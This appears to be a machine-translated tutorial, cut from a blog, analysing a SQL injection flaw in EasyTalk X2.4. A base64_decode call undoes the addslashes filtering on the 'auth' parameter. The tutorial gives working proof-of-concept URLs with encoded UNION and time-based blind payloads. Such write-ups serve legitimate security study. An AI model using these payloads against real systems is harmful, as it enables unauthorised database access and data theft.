0x01 background
Today's web programs basically have a global filter for SQL injection, like PHP to open the GPC or on the global file common.php using the Addslashes () function to filter the received parameters, especially single quotes. In the same article, we need to find some encoding and decoding functions to bypass the global protection, this article describes the case of Base64decode ().
The loophole comes from dark clouds: http://www.wooyun.org/bugs/wooyun-2014-050338
0X02 Environment Construction
Look at the background we used the lower version of the Easytalk program, the version is X2.4
① source I packed a copy: Http://pan.baidu.com/s/1bopOFNL
② Extract to www easytalk directory, follow the prompts step by step installation can, encounter problems themselves Baidu or Google, after successful visits such as:
0X03 Vulnerability Analysis
First look at the source structure, with the thinkphp framework, more complex:
Interested can go to study and then continue to look down, the novice can know that the thinkphp to receive the parameters are filtered, and depending on whether your server open GPC will do the appropriate processing:
1./thinkphp/extend/library/org/util/input.class.php file Line No. 266:
/** +----------------------------------------------------------* If MAGIC_QUOTES_GPC is off, this function can escape the string +----------- -----------------------------------------------* @access public +------------------------------------------------ ----------* @param string $string strings to be processed +----------------------------------------------------------* @return string +----------------------------------------------------------*/static Public Function addslashes ($string) { if (! GET_MAGIC_QUOTES_GPC ()) { $string = addslashes ($string); } return $string;}
2. Use the global search function of the Seay code audit system to search for files containing the keyword "Base64_decode", and find SettingAction.class.php contains a place to base64_decode the received parameters Auth:
3. We followed up this PHP file and found that although the Daddslashes function was used for injection filtering, the Base64_decode function was used to transcode the parameter auth so that the filter could be bypassed to inject:
Authentication e-Mail public Function Doauth () { $_authmsg=daddslashes ($_get[' auth '));//re-determine if GPC is open and inject filter $authmsg = Base64_decode ($_authmsg)//base64_decode function to transcode parameters $tem =explode (":", $authmsg),//to the decoded parameters authmsg in accordance with ":" The $send _id= $tem [0] are divided into the array tem; $user =m (' Users '); $row = $user->field (' Mailadres,auth_email ')->where ("user_id= ' $send _id '")->find ();//Bring into query, in the WHERE clause, causing injection if ($_authmsg== $row [' Auth_email ']) { $user->where ("user_id= ' $send _id '")->setfield (' Auth_email ', 1) ; Setcookie (' Setok ', Json_encode (' Lang ' =>l (' mail6 '), ' ico ' =>1), 0, '/'); } else { Setcookie (' Setok ', Json_encode (' Lang ' =>l (' mail7 '), ' ico ' =>2), 0, '/'); } Header (' Location: '. Site_url. ' /?m=setting&a=mailauth ');}
0x04 Vulnerability Proof
To construct a POC that obtains information about the database:
http://localhost/eazytalk/?m=setting&a=doauth&auth=aGFja2luZycgdW5pb24gc2VsZWN0IHVzZXIoKSwyIw==
View SQL statement Discovery successful execution:
Found here is a blind note, and there is no output, so we use the SQL Blinds statement. Gets the first character of the current database user name that is not a POC of ' R ' (ASCII value 114):
Http://localhost/eazytalk/?m=index&a=mailactivity&auth= micgyw5kichzzwxly3qgawyokgfzy2lpkhn1ynn0cmluzygoc2vszwn0ihvzzxioksksmswxkskgpsaxmtqplhnszwvwkdupldapksm=
The page lasted 5 seconds, stating that the first character of user () was ' r ', and the view of the SQL statement found successfully executed:
Finally, interested students can write a PY script to run the blind.
Original address:
http://www.cnbraid.com/2016/02/18/sql2/